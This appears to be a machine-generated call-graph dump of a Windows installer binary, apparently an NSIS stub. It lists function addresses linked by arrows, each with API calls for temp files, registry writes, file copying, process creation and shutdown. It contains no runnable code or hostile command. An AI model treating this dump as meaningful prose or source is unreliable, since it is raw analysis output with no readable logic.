4165 403d3f 19 API calls 4164->4165 4166 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4165->4166 4167 40139d 80 API calls 4166->4167 4168 4058bc 4167->4168 4168->4132 4169 4058c4 ShowWindow 4168->4169 4170 403daf SendMessageW 4169->4170 4170->4171 4171->4129 4171->4132 4173 406805 18 API calls 4172->4173 4174 403d4a SetDlgItemTextW 4173->4174 4174->4148 4175->4152 4176->4155 4177->4158 4179 403d25 SendMessageW 4178->4179 4180 403d1f 4178->4180 4179->4141 4180->4179 4182 403ddf GetWindowLongW 4181->4182 4192 403e68 4181->4192 4183 403df0 4182->4183 4182->4192 4184 403e02 4183->4184 4185 403dff GetSysColor 4183->4185 4186 403e12 SetBkMode 4184->4186 4187 403e08 SetTextColor 4184->4187 4185->4184 4188 403e30 4186->4188 4189 403e2a GetSysColor 4186->4189 4187->4186 4190 403e41 4188->4190 4191 403e37 SetBkColor 4188->4191 4189->4188 4190->4192 4193 403e54 DeleteObject 4190->4193 4194 403e5b CreateBrushIndirect 4190->4194 4191->4190 4192->4132 4193->4194 4194->4192 4734 4020f9 GetDC GetDeviceCaps 4735 401446 18 API calls 4734->4735 4736 402116 MulDiv 4735->4736 4737 401446 18 API calls 4736->4737 4738 40212c 4737->4738 4739 406805 18 API calls 4738->4739 4740 402165 CreateFontIndirectW 4739->4740 4741 4030dc 4740->4741 4742 4030e3 4741->4742 4744 405f51 wsprintfW 4741->4744 4744->4742 4745 4024fb 4746 40145c 18 API calls 4745->4746 4747 402502 4746->4747 4748 40145c 18 API calls 4747->4748 4749 40250c 4748->4749 4750 40145c 18 API calls 4749->4750 4751 402515 4750->4751 4752 40145c 18 API calls 4751->4752 4753 40251f 4752->4753 4754 40145c 18 API calls 4753->4754 4755 402529 4754->4755 4756 40253d 4755->4756 4757 40145c 18 API calls 4755->4757 4758 4062a3 11 API calls 4756->4758 4757->4756 4759 40256a CoCreateInstance 4758->4759 4760 40258c 4759->4760 4761 40497c GetDlgItem GetDlgItem 4762 4049d2 7 API calls 4761->4762 4767 404bea 4761->4767 4763 404a76 DeleteObject 4762->4763 4764 404a6a SendMessageW 4762->4764 4765 404a81 4763->4765 4764->4763 4768 404ab8 4765->4768 4770 406805 18 API calls 4765->4770 4766 404ccf 4769 404d74 4766->4769 4774 404bdd 4766->4774 4779 404d1e SendMessageW 4766->4779 4767->4766 4777 40484e 5 API calls 4767->4777 4790 404c5a 4767->4790 4773 403d3f 19 API calls 4768->4773 4771 404d89 4769->4771 4772 404d7d SendMessageW 4769->4772 4776 404a9a SendMessageW SendMessageW 4770->4776 4781 404da2 4771->4781 4782 404d9b ImageList_Destroy 4771->4782 4792 404db2 4771->4792 4772->4771 4778 404acc 4773->4778 4780 403dca 8 API calls 4774->4780 4775 404cc1 SendMessageW 4775->4766 4776->4765 4777->4790 4783 403d3f 19 API calls 4778->4783 4779->4774 4785 404d33 SendMessageW 4779->4785 4786 404f6b 4780->4786 4787 404dab GlobalFree 4781->4787 4781->4792 4782->4781 4788 404add 4783->4788 4784 404f1c 4784->4774 4793 404f31 ShowWindow GetDlgItem ShowWindow 4784->4793 4789 404d46 4785->4789 4787->4792 4791 404baa GetWindowLongW SetWindowLongW 4788->4791 4800 404ba4 4788->4800 4803 404b39 SendMessageW 4788->4803 4804 404b67 SendMessageW 4788->4804 4805 404b7b SendMessageW 4788->4805 4799 404d57 SendMessageW 4789->4799 4790->4766 4790->4775 4794 404bc4 4791->4794 4792->4784 4795 404de4 4792->4795 4798 40141d 80 API calls 4792->4798 4793->4774 4796 404be2 4794->4796 4797 404bca ShowWindow 4794->4797 4808 404e12 SendMessageW 4795->4808 4811 404e28 4795->4811 4813 403d98 SendMessageW 4796->4813 4812 403d98 SendMessageW 4797->4812 4798->4795 4799->4769 4800->4791 4800->4794 4803->4788 4804->4788 4805->4788 4806 404ef3 InvalidateRect 4806->4784 4807 404f09 4806->4807 4814 4043ad 4807->4814 4808->4811 4810 404ea1 SendMessageW SendMessageW 4810->4811 4811->4806 4811->4810 4812->4774 4813->4767 4815 4043cd 4814->4815 4816 406805 18 API calls 4815->4816 4817 40440d 4816->4817 4818 406805 18 API calls 4817->4818 4819 404418 4818->4819 4820 406805 18 API calls 4819->4820 4821 404428 lstrlenW wsprintfW SetDlgItemTextW 4820->4821 4821->4784 4822 4026fc 4823 401ee4 4822->4823 4825 402708 4822->4825 4823->4822 4824 406805 18 API calls 4823->4824 4824->4823 4274 4019fd 4275 40145c 18 API calls 4274->4275 4276 401a04 4275->4276 4277 405e7f 2 API calls 4276->4277 4278 401a0b 4277->4278 4826 4022fd 4827 40145c 18 API calls 4826->4827 4828 402304 GetFileVersionInfoSizeW 4827->4828 4829 40232b GlobalAlloc 4828->4829 4833 4030e3 4828->4833 4830 40233f GetFileVersionInfoW 4829->4830 4829->4833 4831 402350 VerQueryValueW 4830->4831 4832 402381 GlobalFree 4830->4832 4831->4832 4835 402369 4831->4835 4832->4833 4839 405f51 wsprintfW 4835->4839 4837 402375 4840 405f51 wsprintfW 4837->4840 4839->4837 4840->4832 4841 402afd 4842 40145c 18 API calls 4841->4842 4843 402b04 4842->4843 4848 405e50 GetFileAttributesW CreateFileW 4843->4848 4845 402b10 4846 4030e3 4845->4846 4849 405f51 wsprintfW 4845->4849 4848->4845 4849->4846 4850 4029ff 4851 401553 19 API calls 4850->4851 4852 402a09 4851->4852 4853 40145c 18 API calls 4852->4853 4854 402a12 4853->4854 4855 402a1f RegQueryValueExW 4854->4855 4857 401a13 4854->4857 4856 402a3f 4855->4856 4860 402a45 4855->4860 4856->4860 4861 405f51 wsprintfW 4856->4861 4859 4029e4 RegCloseKey 4859->4857 4860->4857 4860->4859 4861->4860 4862 401000 4863 401037 BeginPaint GetClientRect 4862->4863 4864 40100c DefWindowProcW 4862->4864 4866 4010fc 4863->4866 4867 401182 4864->4867 4868 401073 CreateBrushIndirect FillRect DeleteObject 4866->4868 4869 401105 4866->4869 4868->4866 4870 401170 EndPaint 4869->4870 4871 40110b CreateFontIndirectW 4869->4871 4870->4867 4871->4870 4872 40111b 6 API calls 4871->4872 4872->4870 4873 401f80 4874 401446 18 API calls 4873->4874 4875 401f88 4874->4875 4876 401446 18 API calls 4875->4876 4877 401f93 4876->4877 4878 401fa3 4877->4878 4879 40145c 18 API calls 4877->4879 4880 401fb3 4878->4880 4881 40145c 18 API calls 4878->4881 4879->4878 4882 402006 4880->4882 4883 401fbc 4880->4883 4881->4880 4885 40145c 18 API calls 4882->4885 4884 401446 18 API calls 4883->4884 4887 401fc4 4884->4887 4886 40200d 4885->4886 4888 40145c 18 API calls 4886->4888 4889 401446 18 API calls 4887->4889 4890 402016 FindWindowExW 4888->4890 4891 401fce 4889->4891 4895 402036 4890->4895 4892 401ff6 SendMessageW 4891->4892 4893 401fd8 SendMessageTimeoutW 4891->4893 4892->4895 4893->4895 4894 4030e3 4895->4894 4897 405f51 wsprintfW 4895->4897 4897->4894 4898 402880 4899 402884 4898->4899 4900 40145c 18 API calls 4899->4900 4901 4028a7 4900->4901 4902 40145c 18 API calls 4901->4902 4903 4028b1 4902->4903 4904 4028ba RegCreateKeyExW 4903->4904 4905 4028e8 4904->4905 4912 4029ef 4904->4912 4906 402934 4905->4906 4907 40145c 18 API calls 4905->4907 4908 402963 4906->4908 4911 401446 18 API calls 4906->4911 4910 4028fc lstrlenW 4907->4910 4909 4029ae RegSetValueExW 4908->4909 4913 40337f 37 API calls 4908->4913 4916 4029c6 RegCloseKey 4909->4916 4917 4029cb 4909->4917 4914 402918 4910->4914 4915 40292a 4910->4915 4918 402947 4911->4918 4919 40297b 4913->4919 4920 4062a3 11 API calls 4914->4920 4921 4062a3 11 API calls 4915->4921 4916->4912 4922 4062a3 11 API calls 4917->4922 4923 4062a3 11 API calls 4918->4923 4929 406224 4919->4929 4925 402922 4920->4925 4921->4906 4922->4916 4923->4908 4925->4909 4928 4062a3 11 API calls 4928->4925 4930 406247 4929->4930 4931 40628a 4930->4931 4932 40625c wsprintfW 4930->4932 4933 402991 4931->4933 4934 406293 lstrcatW 4931->4934 4932->4931 4932->4932 4933->4928 4934->4933 4935 402082 4936 401446 18 API calls 4935->4936 4937 402093 SetWindowLongW 4936->4937 4938 4030e3 4937->4938 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3709 40141d 3520->3709 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3701 406c68 3529->3701 3706 405c3f CreateProcessW 3529->3706 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3712 406038 3546->3712 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3721 406722 lstrlenW CharPrevW 3549->3721 3728 405e50 GetFileAttributesW CreateFileW 3554->3728 3556 4035c7 3577 4035d7 3556->3577 3729 406009 lstrcpynW 3556->3729 3558 4035ed 3730 406751 lstrlenW 3558->3730 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3737 4032d2 3563->3737 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3771 403368 SetFilePointer 3565->3771 3748 403368 SetFilePointer 3567->3748 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3749 40337f 3571->3749 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3735 403336 ReadFile 3576->3735 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3812 405f51 wsprintfW 3585->3812 3813 405ed3 RegOpenKeyExW 3586->3813 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3795 403e95 3592->3795 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3819 403e74 3602->3819 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3818 406009 lstrcpynW 3620->3818 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3804 405047 OleInitialize 3626->3804 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3964 403c83 3640->3964 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4021 406009 lstrcpynW 3651->4021 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4022 405e50 GetFileAttributesW CreateFileW 3674->4022 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3698 406812 3683->3698 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4025 406009 lstrcpynW 3684->4025 3685->3527 3685->3529 3687 4068d3 GetVersion 3687->3698 3688 406a46 lstrlenW 3688->3698 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3698 3693 406952 GetSystemDirectoryW 3693->3698 3694 406965 GetWindowsDirectoryW 3694->3698 3695 406038 5 API calls 3695->3698 3696 406805 10 API calls 3696->3698 3697 4069df lstrcatW 3697->3698 3698->3684 3698->3687 3698->3688 3698->3689 3698->3692 3698->3693 3698->3694 3698->3695 3698->3696 3698->3697 3699 406999 SHGetSpecialFolderLocation 3698->3699 4023 405f51 wsprintfW 3698->4023 4024 406009 lstrcpynW 3698->4024 3699->3698 3700 4069b1 SHGetPathFromIDListW CoTaskMemFree 3699->3700 3700->3698 3702 4062fc 3 API calls 3701->3702 3703 406c6f 3702->3703 3705 406c90 3703->3705 4026 406a99 lstrcpyW 3703->4026 3705->3529 3707 405c7a 3706->3707 3708 405c6e CloseHandle 3706->3708 3707->3529 3708->3707 3710 40139d 80 API calls 3709->3710 3711 401432 3710->3711 3711->3495 3718 406045 3712->3718 3713 4060bb 3714 4060c1 CharPrevW 3713->3714 3716 4060e1 3713->3716 3714->3713 3715 4060ae CharNextW 3715->3713 3715->3718 3716->3549 3717 405d06 CharNextW 3717->3718 3718->3713 3718->3715 3718->3717 3719 40609a CharNextW 3718->3719 3720 4060a9 CharNextW 3718->3720 3719->3718 3720->3715 3722 4037ea CreateDirectoryW 3721->3722 3723 40673f lstrcatW 3721->3723 3724 405e7f 3722->3724 3723->3722 3725 405e8c GetTickCount GetTempFileNameW 3724->3725 3726 405ec2 3725->3726 3727 4037fe 3725->3727 3726->3725 3726->3727 3727->3475 3728->3556 3729->3558 3731 406760 3730->3731 3732 4035f3 3731->3732 3733 406766 CharPrevW 3731->3733 3734 406009 lstrcpynW 3732->3734 3733->3731 3733->3732 3734->3562 3736 403357 3735->3736 3736->3576 3738 4032f3 3737->3738 3739 4032db 3737->3739 3742 403303 GetTickCount 3738->3742 3743 4032fb 3738->3743 3740 4032e4 DestroyWindow 3739->3740 3741 4032eb 3739->3741 3740->3741 3741->3565 3745 403311 CreateDialogParamW ShowWindow 3742->3745 3746 403334 3742->3746 3772 406332 3743->3772 3745->3746 3746->3565 3748->3571 3751 403398 3749->3751 3750 4033c3 3753 403336 ReadFile 3750->3753 3751->3750 3794 403368 SetFilePointer 3751->3794 3754 4033ce 3753->3754 3755 4033e7 GetTickCount 3754->3755 3756 403518 3754->3756 3758 4033d2 3754->3758 3768 4033fa 3755->3768 3757 40351c 3756->3757 3762 403540 3756->3762 3759 403336 ReadFile 3757->3759 3758->3580 3759->3758 3760 403336 ReadFile 3760->3762 3761 403336 ReadFile 3761->3768 3762->3758 3762->3760 3763 40355f WriteFile 3762->3763 3763->3758 3764 403574 3763->3764 3764->3758 3764->3762 3766 40345c GetTickCount 3766->3768 3767 403485 MulDiv wsprintfW 3783 404f72 3767->3783 3768->3758 3768->3761 3768->3766 3768->3767 3770 4034c9 WriteFile 3768->3770 3776 407312 3768->3776 3770->3758 3770->3768 3771->3572 3773 40634f PeekMessageW 3772->3773 3774 406345 DispatchMessageW 3773->3774 3775 403301 3773->3775 3774->3773 3775->3565 3777 407332 3776->3777 3778 40733a 3776->3778 3777->3768 3778->3777 3779 4073c2 GlobalFree 3778->3779 3780 4073cb GlobalAlloc 3778->3780 3781 407443 GlobalAlloc 3778->3781 3782 40743a GlobalFree 3778->3782 3779->3780 3780->3777 3780->3778 3781->3777 3781->3778 3782->3781 3784 404f8b 3783->3784 3793 40502f 3783->3793 3785 404fa9 lstrlenW 3784->3785 3786 406805 18 API calls 3784->3786 3787 404fd2 3785->3787 3788 404fb7 lstrlenW 3785->3788 3786->3785 3790 404fe5 3787->3790 3791 404fd8 SetWindowTextW 3787->3791 3789 404fc9 lstrcatW 3788->3789 3788->3793 3789->3787 3792 404feb SendMessageW SendMessageW SendMessageW 3790->3792 3790->3793 3791->3790 3792->3793 3793->3768 3794->3750 3796 403ea9 3795->3796 3824 405f51 wsprintfW 3796->3824 3798 403f1d 3799 406805 18 API calls 3798->3799 3800 403f29 SetWindowTextW 3799->3800 3802 403f44 3800->3802 3801 403f5f 3801->3595 3802->3801 3803 406805 18 API calls 3802->3803 3803->3802 3825 403daf 3804->3825 3806 40506a 3809 4062a3 11 API calls 3806->3809 3811 405095 3806->3811 3828 40139d 3806->3828 3807 403daf SendMessageW 3808 4050a5 OleUninitialize 3807->3808 3808->3632 3809->3806 3811->3807 3812->3592 3814 405f07 RegQueryValueExW 3813->3814 3815 405989 3813->3815 3816 405f29 RegCloseKey 3814->3816 3815->3590 3815->3591 3816->3815 3818->3597 3963 406009 lstrcpynW 3819->3963 3821 403e88 3822 406722 3 API calls 3821->3822 3823 403e8e lstrcatW 3822->3823 3823->3615 3824->3798 3826 403dc7 3825->3826 3827 403db8 SendMessageW 3825->3827 3826->3806 3827->3826 3831 4013a4 3828->3831 3829 401410 3829->3806 3831->3829 3832 4013dd MulDiv SendMessageW 3831->3832 3833 4015a0 3831->3833 3832->3831 3834 4015fa 3833->3834 3913 40160c 3833->3913 3835 401601 3834->3835 3836 401742 3834->3836 3837 401962 3834->3837 3838 4019ca 3834->3838 3839 40176e 3834->3839 3840 401650 3834->3840 3841 4017b1 3834->3841 3842 401672 3834->3842 3843 401693 3834->3843 3844 401616 3834->3844 3845 4016d6 3834->3845 3846 401736 3834->3846 3847 401897 3834->3847 3848 4018db 3834->3848 3849 40163c 3834->3849 3850 4016bd 3834->3850 3834->3913 3863 4062a3 11 API calls 3835->3863 3855 401751 ShowWindow 3836->3855 3856 401758 3836->3856 3860 40145c 18 API calls 3837->3860 3853 40145c 18 API calls 3838->3853 3857 40145c 18 API calls 3839->3857 3880 4062a3 11 API calls 3840->3880 3946 40145c 3841->3946 3858 40145c 18 API calls 3842->3858 3940 401446 3843->3940 3852 40145c 18 API calls 3844->3852 3869 401446 18 API calls 3845->3869 3845->3913 3846->3913 3962 405f51 wsprintfW 3846->3962 3859 40145c 18 API calls 3847->3859 3864 40145c 18 API calls 3848->3864 3854 401647 PostQuitMessage 3849->3854 3849->3913 3851 4062a3 11 API calls 3850->3851 3866 4016c7 SetForegroundWindow 3851->3866 3867 40161c 3852->3867 3868 4019d1 SearchPathW 3853->3868 3854->3913 3855->3856 3870 401765 ShowWindow 3856->3870 3856->3913 3871 401775 3857->3871 3872 401678 3858->3872 3873 40189d 3859->3873 3874 401968 GetFullPathNameW 3860->3874 3863->3913 3865 4018e2 3864->3865 3877 40145c 18 API calls 3865->3877 3866->3913 3878 4062a3 11 API calls 3867->3878 3868->3913 3869->3913 3870->3913 3881 4062a3 11 API calls 3871->3881 3882 4062a3 11 API calls 3872->3882 3958 4062d5 FindFirstFileW 3873->3958 3884 40197f 3874->3884 3926 4019a1 3874->3926 3876 40169a 3943 4062a3 lstrlenW wvsprintfW 3876->3943 3887 4018eb 3877->3887 3888 401627 3878->3888 3889 401664 3880->3889 3890 401785 SetFileAttributesW 3881->3890 3891 401683 3882->3891 3908 4062d5 2 API calls 3884->3908 3884->3926 3885 4062a3 11 API calls 3893 4017c9 3885->3893 3896 40145c 18 API calls 3887->3896 3897 404f72 25 API calls 3888->3897 3898 40139d 65 API calls 3889->3898 3899 40179a 3890->3899 3890->3913 3906 404f72 25 API calls 3891->3906 3951 405d59 CharNextW CharNextW 3893->3951 3895 4019b8 GetShortPathNameW 3895->3913 3904 4018f5 3896->3904 3897->3913 3898->3913 3905 4062a3 11 API calls 3899->3905 3900 4018c2 3909 4062a3 11 API calls 3900->3909 3901 4018a9 3907 4062a3 11 API calls 3901->3907 3911 4062a3 11 API calls 3904->3911 3905->3913 3906->3913 3907->3913 3912 401991 3908->3912 3909->3913 3910 4017d4 3914 401864 3910->3914 3917 405d06 CharNextW 3910->3917 3935 4062a3 11 API calls 3910->3935 3915 401902 MoveFileW 3911->3915 3912->3926 3961 406009 lstrcpynW 3912->3961 3913->3831 3914->3891 3916 40186e 3914->3916 3918 401912 3915->3918 3919 40191e 3915->3919 3920 404f72 25 API calls 3916->3920 3922 4017e6 CreateDirectoryW 3917->3922 3918->3891 3924 401942 3919->3924 3929 4062d5 2 API calls 3919->3929 3925 401875 3920->3925 3922->3910 3923 4017fe GetLastError 3922->3923 3927 401827 GetFileAttributesW 3923->3927 3928 40180b GetLastError 3923->3928 3934 4062a3 11 API calls 3924->3934 3957 406009 lstrcpynW 3925->3957 3926->3895 3926->3913 3927->3910 3931 4062a3 11 API calls 3928->3931 3932 401929 3929->3932 3931->3910 3932->3924 3937 406c68 42 API calls 3932->3937 3933 401882 SetCurrentDirectoryW 3933->3913 3936 40195c 3934->3936 3935->3910 3936->3913 3938 401936 3937->3938 3939 404f72 25 API calls 3938->3939 3939->3924 3941 406805 18 API calls 3940->3941 3942 401455 3941->3942 3942->3876 3944 4060e7 9 API calls 3943->3944 3945 4016a7 Sleep 3944->3945 3945->3913 3947 406805 18 API calls 3946->3947 3948 401488 3947->3948 3949 401497 3948->3949 3950 406038 5 API calls 3948->3950 3949->3885 3950->3949 3952 405d76 3951->3952 3953 405d88 3951->3953 3952->3953 3954 405d83 CharNextW 3952->3954 3955 405dac 3953->3955 3956 405d06 CharNextW 3953->3956 3954->3955 3955->3910 3956->3953 3957->3933 3959 4018a5 3958->3959 3960 4062eb FindClose 3958->3960 3959->3900 3959->3901 3960->3959 3961->3926 3962->3913 3963->3821 3965 403c91 3964->3965 3966 403876 3965->3966 3967 403c96 FreeLibrary GlobalFree 3965->3967 3968 406c9b 3966->3968 3967->3966 3967->3967 3969 40677e 18 API calls 3968->3969 3970 406cae 3969->3970 3971 406cb7 DeleteFileW 3970->3971 3972 406cce 3970->3972 4012 403882 CoUninitialize 3971->4012 3973 406e4b 3972->3973 4016 406009 lstrcpynW 3972->4016 3979 4062d5 2 API calls 3973->3979 4001 406e58 3973->4001 3973->4012 3975 406cf9 3976 406d03 lstrcatW 3975->3976 3977 406d0d 3975->3977 3978 406d13 3976->3978 3980 406751 2 API calls 3977->3980 3982 406d23 lstrcatW 3978->3982 3983 406d19 3978->3983 3981 406e64 3979->3981 3980->3978 3986 406722 3 API calls 3981->3986 3981->4012 3985 406d2b lstrlenW FindFirstFileW 3982->3985 3983->3982 3983->3985 3984 4062a3 11 API calls 3984->4012 3987 406e3b 3985->3987 3991 406d52 3985->3991 3988 406e6e 3986->3988 3987->3973 3990 4062a3 11 API calls 3988->3990 3989 405d06 CharNextW 3989->3991 3992 406e79 3990->3992 3991->3989 3995 406e18 FindNextFileW 3991->3995 4004 406c9b 72 API calls 3991->4004 4011 404f72 25 API calls 3991->4011 4013 4062a3 11 API calls 3991->4013 4014 404f72 25 API calls 3991->4014 4015 406c68 42 API calls 3991->4015 4017 406009 lstrcpynW 3991->4017 4018 405e30 GetFileAttributesW 3991->4018 3993 405e30 2 API calls 3992->3993 3994 406e81 RemoveDirectoryW 3993->3994 3998 406ec4 3994->3998 3999 406e8d 3994->3999 3995->3991 3997 406e30 FindClose 3995->3997 3997->3987 4000 404f72 25 API calls 3998->4000 3999->4001 4002 406e93 3999->4002 4000->4012 4001->3984 4003 4062a3 11 API calls 4002->4003 4005 406e9d 4003->4005 4004->3991 4007 404f72 25 API calls 4005->4007 4009 406ea7 4007->4009 4010 406c68 42 API calls 4009->4010 4010->4012 4011->3995 4012->3491 4012->3492 4013->3991 4014->3991 4015->3991 4016->3975 4017->3991 4019 405e4d DeleteFileW 4018->4019 4020 405e3f SetFileAttributesW 4018->4020 4019->3991 4020->4019 4021->3653 4022->3677 4023->3698 4024->3698 4025->3685 4027 406ae7 GetShortPathNameW 4026->4027 4028 406abe 4026->4028 4029 406b00 4027->4029 4030 406c62 4027->4030 4052 405e50 GetFileAttributesW CreateFileW 4028->4052 4029->4030 4032 406b08 WideCharToMultiByte 4029->4032 4030->3705 4032->4030 4034 406b25 WideCharToMultiByte 4032->4034 4033 406ac7 CloseHandle GetShortPathNameW 4033->4030 4035 406adf 4033->4035 4034->4030 4036 406b3d wsprintfA 4034->4036 4035->4027 4035->4030 4037 406805 18 API calls 4036->4037 4038 406b69 4037->4038 4053 405e50 GetFileAttributesW CreateFileW 4038->4053 4040 406b76 4040->4030 4041 406b83 GetFileSize GlobalAlloc 4040->4041 4042 406ba4 ReadFile 4041->4042 4043 406c58 CloseHandle 4041->4043 4042->4043 4044 406bbe 4042->4044 4043->4030 4044->4043 4054 405db6 lstrlenA 4044->4054 4047 406bd7 lstrcpyA 4050 406bf9 4047->4050 4048 406beb 4049 405db6 4 API calls 4048->4049 4049->4050 4051 406c30 SetFilePointer WriteFile GlobalFree 4050->4051 4051->4043 4052->4033 4053->4040 4055 405df7 lstrlenA 4054->4055 4056 405dd0 lstrcmpiA 4055->4056 4057 405dff 4055->4057 4056->4057 4058 405dee CharNextA 4056->4058 4057->4047 4057->4048 4058->4055 4939 402a84 4940 401553 19 API calls 4939->4940 4941 402a8e 4940->4941 4942 401446 18 API calls 4941->4942 4943 402a98 4942->4943 4944 401a13 4943->4944 4945 402ab2 RegEnumKeyW 4943->4945 4946 402abe RegEnumValueW 4943->4946 4947 402a7e 4945->4947 4946->4944 4946->4947 4947->4944 4948 4029e4 RegCloseKey 4947->4948 4948->4944 4949 402c8a 4950 402ca2 4949->4950 4951 402c8f 4949->4951 4953 40145c 18 API calls 4950->4953 4952 401446 18 API calls 4951->4952 4955 402c97 4952->4955 4954 402ca9 lstrlenW 4953->4954 4954->4955 4956 402ccb WriteFile 4955->4956 4957 401a13 4955->4957 4956->4957 4958 40400d 4959 40406a 4958->4959 4960 40401a lstrcpynA lstrlenA 4958->4960 4960->4959 4961 40404b 4960->4961 4961->4959 4962 404057 GlobalFree 4961->4962 4962->4959 4963 401d8e 4964 40145c 18 API calls 4963->4964 4965 401d95 ExpandEnvironmentStringsW 4964->4965 4966 401da8 4965->4966 4968 401db9 4965->4968 4967 401dad lstrcmpW 4966->4967 4966->4968 4967->4968 4969 401e0f 4970 401446 18 API calls 4969->4970 4971 401e17 4970->4971 4972 401446 18 API calls 4971->4972 4973 401e21 4972->4973 4974 4030e3 4973->4974 4976 405f51 wsprintfW 4973->4976 4976->4974 4977 402392 4978 40145c 18 API calls 4977->4978 4979 402399 4978->4979 4982 4071f8 4979->4982 4983 406ed2 25 API calls 4982->4983 4984 407218 4983->4984 4985 407222 lstrcpynW lstrcmpW 4984->4985 4986 4023a7 